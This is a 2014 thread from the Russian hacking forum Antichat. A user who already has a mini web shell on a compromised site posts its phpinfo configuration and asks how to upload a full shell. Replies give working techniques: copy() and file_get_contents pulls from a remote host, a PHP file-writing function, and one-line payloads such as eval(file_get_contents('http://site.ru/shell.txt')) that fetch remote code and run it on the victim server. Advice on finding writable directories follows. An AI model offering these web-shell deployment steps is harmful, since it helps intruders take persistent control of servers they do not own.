ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Помощь с заливкой шелла через мини-шелл. (https://forum.antichat.xyz/showthread.php?t=416990)

6nick9 09.09.2014 23:56
Помогите залить шелл через мини-шелл.

phpinfo(); выводит, но шелл не заливается.

Пробовал: copy('http://site.ru/s.txt','s.php');

Конфигурация PHP из phpinfo:

Код:
Directive        Local Value        Master Value
allow_call_time_pass_reference        Off        Off
allow_url_fopen        On        On
allow_url_include        Off        Off
always_populate_raw_post_data        Off        Off
arg_separator.input        &        &
arg_separator.output        &        &
asp_tags        Off        Off
auto_append_file        no value        no value
auto_globals_jit        On        On
auto_prepend_file        no value        no value
browscap        no value        no value
default_charset        no value        no value
default_mimetype        text/html        text/html
define_syslog_variables        Off        Off
disable_classes        no value        no value
disable_functions        exec,passthru,shell_exec,system,proc_open,popen        exec,passthru,shell_exec,system,proc_open,popen
display_errors        Off        Off
display_startup_errors        Off        Off
doc_root        no value        no value
docref_ext        no value        no value
docref_root        no value        no value
enable_dl        Off        Off
error_append_string        no value        no value
error_log        no value        no value
error_prepend_string        no value        no value
error_reporting        6143        6143
expose_php        On        On
extension_dir        /usr/lib/php52/20060613        /usr/lib/php52/20060613
file_uploads        On        On
highlight.bg        #FFFFFF        #FFFFFF
highlight.comment        #FF8000        #FF8000
highlight.default        #0000BB        #0000BB
highlight.html        #000000        #000000
highlight.keyword        #007700        #007700
highlight.string        #DD0000        #DD0000
html_errors        Off        Off
ignore_repeated_errors        Off        Off
ignore_repeated_source        Off        Off
ignore_user_abort        Off        Off
implicit_flush        Off        Off
include_path        .:/usr/share/pear        .:/usr/share/pear
log_errors        On        On
log_errors_max_len        1024        1024
magic_quotes_gpc        Off        Off
magic_quotes_runtime        Off        Off
magic_quotes_sybase        Off        Off
mail.force_extra_parameters        no value        no value
max_execution_time        300        300
max_file_uploads        20        20
max_input_nesting_level        64        64
max_input_time        180        180
memory_limit        1024M        1024M
open_basedir        /var/www/site-ru/data:.        no value
output_buffering        4096        4096
output_handler        no value        no value
post_max_size        70M        70M
precision        14        14
realpath_cache_size        16K        16K
realpath_cache_ttl        120        120
register_argc_argv        Off        Off
register_globals        On        On
register_long_arrays        Off        Off
report_memleaks        On        On
report_zend_debug        On        On
safe_mode        Off        Off
safe_mode_exec_dir        no value        no value
safe_mode_gid        Off        Off
safe_mode_include_dir        no value        no value
sendmail_from        no value        no value
sendmail_path        /usr/sbin/sendmail -t -i -f site@site.org        /usr/sbin/sendmail -t -i
serialize_precision        100        100
short_open_tag        On        On
SMTP        localhost        localhost
smtp_port        25        25
sql.safe_mode        Off        Off
suhosin.log.phpscript.is_safe        Off        Off
track_errors        Off        Off
unserialize_callback_func        no value        no value
upload_max_filesize        70M        70M
upload_tmp_dir        /var/www/site-ru/data/mod-tmp        no value
user_dir        no value        no value
variables_order        GPCS        GPCS
xmlrpc_error_number        0        0
xmlrpc_errors        Off        Off
y2k_compliance        On        On
zend.ze1_compatibility_mode        Off        Off

faza02 10.09.2014 01:24
file_get_contents, например . возможно нет прав на запись в эту папку.

также, /thread307894.html

и да, есть тема с вопросами /thread46016.html, поищи в ней по "allow_url_fopen"

и вот нашел, наконец, тыц

look2009 10.09.2014 01:25
copy('http://site.ru/s.txt','s.php'); нужно

Нужно прописать полный путь, если есть раскрытие путей, посмотри, и пробуй полный путь прописать. /var/www/site-ru/data не похоже на полный путь до сайта, хотя не уверен.

Ну на крайняк

Если file_get_contents не сработает пробуй курл, и если уже записался в какую либо диру то права есть, phpinfo() я так понял из залитого файла выводишь?

faza02 10.09.2014 01:28
look2009,

Цитата:
Сообщение от None
disable_functions exec,passthru,shell_exec,
system

look2009 10.09.2014 02:05
Сорри не заметил, пробуй шелл записать через запрос файла file get content или пиши curl скрипт запроса шелла в тело переменной и записывай в файл. Можешь записать полностью файл через file_put_contents, или так.

function save_file($file,$content)

{

$open = fopen($file,'ab');

fwrite($open,$content."\r\n");

fclose($open);

}

?a=eval(file_get_contents('http://site.ru/bla_bla.txt'));

Ну это конечно самое простое. )))

qaz 10.09.2014 15:35
eval(file_get_contents("http://site.ru/shell.txt")); дальше лазишь и ищешь папку с разрешением на запись


Время: 12:34